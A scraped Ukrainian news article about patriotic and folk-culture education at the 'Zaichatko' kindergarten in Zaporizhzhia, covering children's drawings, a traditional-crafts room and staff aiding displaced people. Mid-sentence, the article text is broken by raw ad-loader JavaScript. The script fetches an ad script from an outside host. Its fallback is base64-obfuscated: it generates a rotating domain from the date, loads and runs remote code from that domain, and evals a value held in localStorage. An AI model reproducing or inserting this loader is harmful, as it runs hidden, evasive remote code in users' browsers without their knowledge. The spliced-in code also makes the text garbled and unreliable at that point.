Малюнки перемоги, світлиця та етностилі: як у дитсадку в Запоріжжі виховують патріотизм у дітей (ФОТО, ВІДЕО)

Не дивлячись на війну та неможливість навчання у звичному режимі, вихователі дошкільних закладів освіти Запоріжжя працюють з малечею. При цьому роблять це одночасно виховуючи в них патріотизм та любов до рідної України.

Як це відбувається у дитячому садку “Зайчатко”, що в Комунарському районі — у репортажі Акцента.

У дитячому садку “Зайчатко” до виховання малечі підходять грунтовно. Керівництво закладу та педагогічний склад приділяють чимало уваги до патріотичного виховання дітей.

Так, зокрема до Дня Незалежності малеча підготувала малюнки на патріотичну тему, а у садочку зробили виставку робіт. Ті діти, що знаходяться у Запоріжжі, передали свою малюнки безпосередньо у навчальний заклад. Ті хлопці та дівчата, що перебувають за кордоном — надіслали електронні версії своїх робіт.

Журналістам малеча, що була присутня цього дня на виставці розповіла, що і як вони малювали. Малюнки дуже різні, але всіх їх об’єднує одне — любов до Україна та віра в перемогу. Тут можна побачити і прапори, квіти, сонце, карти України, і навіть «Новину дня на телебаченні» — “Україна перемогла!”

Крім того, в дитячому садку є ще одна локація — “Світлиця”. Це спільна багаторічна робота працівників дитячого садка та батьків вихованців. Тут можна ознайомитися з традиціями українського народу — ремеслами, оберегами, традиціями побуту та житла українців var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

“Світлиця — це результат спільної праці і творчого пошуку педагогів, дітей і батьків. Створено Світлицю силами працівників дитячого садка та батьків вихованців, які постійно поповнюють його новими експонатами. Це особливий розвивальний простір, покликаний долучити дитину до світу мистецтва, розширити її культурний й національний світогляд. Екскурсії до світлиці, заняття з народознавства дають прекрасну можливість формувати уявлення вихованців про традиційне житло та побут українців; знайомити дітей з українськими народними ремеслами, народною іграшкою, поглибити та закріпити знання малят про народні символи та обереги; виховувати інтерес до особливостей старовинної національної оселі, почуття поваги до українських народних звичаїв, обрядів, традицій, до людей творчої праці; прищеплювати бажання вивчати історію рідного краю, зацікавленість витворами мистецтва українських майстрів, рукодільниць; заохочувати дітей до творчості.”, — розповідає директор ДНЗ № 274 Маргарита Лінчук.

Маргарита Лінчук

Крім того в кожній групі є своє патріотичні куточки. Вихователь Галіна Сасіна поділилася, яким чином вихователі заохочують дітей до вивчення української культури, а також розповіла про етностилі, зокрема свою вишиванку, яку для неї вишила сестра.

“В нас творчі креативні вихователі, вони створюють дидактичні ігри самостійно, це і рухливі і народні ігри, тому дітки завжди зацікавлені, Їм подобається вбрання, насамперед вишивка. Якою доречі зацікавлені не тільки діти, але ї вихователі. Гарне національне вбрання — це насамперед генетичний код нашого народу”, — розповідає вихователька.

Весь колектив садочку з нетерпінням чекає на можливість знову займатися з вихованцями очно у садочку. А поки співробітники ДНЗ чергують та допомагають вимушеним переселенцям з окупованих територій та зони бойових дій. Тут у садочку можна відпочити та залишитися на першу ніч по прибуттю до Запоріжжя. Раніше Акцент вже розповідав, як вихователі “Зайчатки” працюють волонтерами, приймаючи евакуйованих людей зі Сходу та Півдня України.

Більше фото: (adsbygoogle = window.adsbygoogle || []).push({});

Галина Сасіна розповідає про свої етностилі Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/malyunki-peremogi-svitlitsya-ta-etnostili-yak-u-ditsadku-v-zaporizhzhi-vihovuyut-patriotizm-u-ditej-foto-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top